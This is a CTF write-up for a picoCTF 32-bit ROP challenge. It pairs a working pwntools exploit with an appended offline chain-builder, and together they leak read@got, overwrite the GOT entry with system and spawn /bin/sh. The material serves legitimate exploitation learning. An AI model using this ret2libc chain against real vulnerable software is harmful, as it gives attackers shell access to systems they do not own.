
picoctf pwnable_rop_3 Write up

Ta-da ~~~ 32-bit binary ~~~~

 

Let's exploit it..

read and write are both in the PLT, which is all we need.. haha. The binary is not PIE (the PLT, GOT, .bss and gadget addresses are fixed), so only libc has to be located: write leaks read's libc address out of the GOT, read overwrites that same GOT entry with system (leak minus the fixed read-to-system offset of the target libc) and also drops "/bin/sh" into .bss, and then read@plt, which now jumps to system, is called with the .bss address. 140 bytes of padding reach the saved return address, and a pop;pop;pop;ret gadget clears the three arguments between calls.

So you just exploit it..haha..

 

from pwn import *

p = process("./rop")
binf = ELF("./rop")

context.terminal = ['tmux', 'splitw', '-h']
#gdb.attach(p)

pppr = 0x0804855d              # pop; pop; pop; ret - discards 3 args between calls
bss = 0x0804a020               # writable scratch space for "/bin/sh"
offset = 0x9ad60               # read - system in the target libc
addr_read_plt = binf.plt['read']
addr_read_got = binf.got['read']
addr_write_plt = binf.plt['write']
addr_write_got = binf.got['write']

payload = b"A" * 140           # fill the buffer up to the saved EIP

# 1) read(0, bss, 8): put "/bin/sh\0" into .bss
payload += p32(addr_read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(8)

# 2) write(1, &read@got, 4): leak read's libc address
payload += p32(addr_write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(addr_read_got)
payload += p32(4)

# 3) read(0, &read@got, 4): overwrite the GOT entry with system
payload += p32(addr_read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(addr_read_got)
payload += p32(4)

# 4) read@plt now jumps to system -> system(bss) == system("/bin/sh")
payload += p32(addr_read_plt)
payload += b"A" * 4            # last call, the return address does not matter
payload += p32(bss)

p.send(payload)

p.send(b"/bin/sh\x00")         # consumed by step 1 (exactly the 8 bytes requested)

read_leak = u32(p.recvn(4))    # step 2 writes exactly 4 bytes
log.info("leak : " + hex(read_leak))
system = read_leak - offset
log.info("system : " + hex(system))

p.send(p32(system))            # consumed by step 3
p.interactive()

When I first did this the system offset kept coming out wrong, so I flailed around for a while before barely getting it to work...haha... And then I had left out one gadget, so it broke again; after about 10 minutes? of messing around it finally worked...haha...
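The chain above is built by hand, which is exactly how a gadget gets forgotten: every call frame is [function][return address][args...], and the return address has to be a pop-N;ret gadget with N equal to the number of arguments, or the next frame is misaligned. The following is an added example, not code from the write-up, that builds the same four-call chain from a list of (function, args) pairs and refuses to build a frame when no matching pop-N gadget is known. It uses plain struct instead of pwntools so it runs offline; pppr, bss, the 140-byte padding and the 0x9ad60 offset are the write-up's own numbers, while READ_PLT, WRITE_PLT and READ_GOT are made-up stand-ins for what ELF("./rop").plt / .got would return, and the leaked address in the usage is constructed.

```python
import struct


def p32(value):
    """Pack a dword little-endian, like pwntools' p32."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def u32(data):
    """Unpack exactly four little-endian bytes, like pwntools' u32."""
    if len(data) != 4:
        raise ValueError("u32 needs exactly 4 bytes, got %d" % len(data))
    return struct.unpack("<I", data)[0]


def rop_call(func, args, gadgets, last=False):
    """One call frame of a 32-bit (cdecl) ROP chain.

    Stack layout, low to high address:
        [func] [return address] [arg0] [arg1] ...
    func runs with args in place; when it returns it lands on the return
    address, which must be a "pop x N; ret" gadget with N == len(args) so the
    arguments are discarded and execution continues at the next frame's func.
    The last frame has nothing after it, so any junk return address works
    (the write-up uses "AAAA").
    """
    n = len(args)
    if last:
        ret = 0x41414141  # "AAAA"
    else:
        if n not in gadgets:
            raise ValueError("no pop*%d; ret gadget: the next frame would be misaligned" % n)
        ret = gadgets[n]
    return p32(func) + p32(ret) + b"".join(p32(a) for a in args)


def build_chain(calls, gadgets, padding=140):
    """Padding up to the saved EIP followed by one frame per call."""
    frames = [
        rop_call(func, args, gadgets, last=(i == len(calls) - 1))
        for i, (func, args) in enumerate(calls)
    ]
    return b"A" * padding + b"".join(frames)


def rop3_payload(read_plt, read_got, write_plt, bss, gadgets):
    """The write-up's chain: leak read@got, overwrite it with system, call it."""
    calls = [
        (read_plt,  [0, bss, 8]),        # read(0, bss, 8): "/bin/sh\0" into .bss
        (write_plt, [1, read_got, 4]),   # write(1, &read@got, 4): leak read
        (read_plt,  [0, read_got, 4]),   # read(0, &read@got, 4): GOT -> system
        (read_plt,  [bss]),              # read@plt now jumps to system(bss)
    ]
    return build_chain(calls, gadgets)


def system_from_leak(leaked, offset):
    """Given the 4 leaked bytes of read@got, compute system's libc address."""
    return u32(leaked) - offset


# pppr, bss, offset are the write-up's numbers; the PLT/GOT values are
# hypothetical stand-ins for ELF("./rop").plt['read'] etc.
PPPR = 0x0804855D
BSS = 0x0804A020
OFFSET = 0x9AD60          # read - system in the target libc
READ_PLT = 0x08048300     # hypothetical
WRITE_PLT = 0x08048320    # hypothetical
READ_GOT = 0x0804A00C     # hypothetical
GADGETS = {3: PPPR}       # only a pop3 gadget is known, as in the write-up


if __name__ == "__main__":
    payload = rop3_payload(READ_PLT, READ_GOT, WRITE_PLT, BSS, GADGETS)
    print("payload is %d bytes" % len(payload))
    # Constructed leak: pretend read sits at 0xf7ec0d60 in the remote libc.
    print("system @ %#x" % system_from_leak(p32(0xF7EC0D60), OFFSET))
```

With only a pop3 gadget in the table, a two-argument call anywhere but the last position raises instead of silently producing a chain that crashes on the second frame, which is the failure the write-up describes. Adding a `{1: pop_ret, 2: pop_pop_ret}` entry from ROPgadget output extends it to mixed-arity chains.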
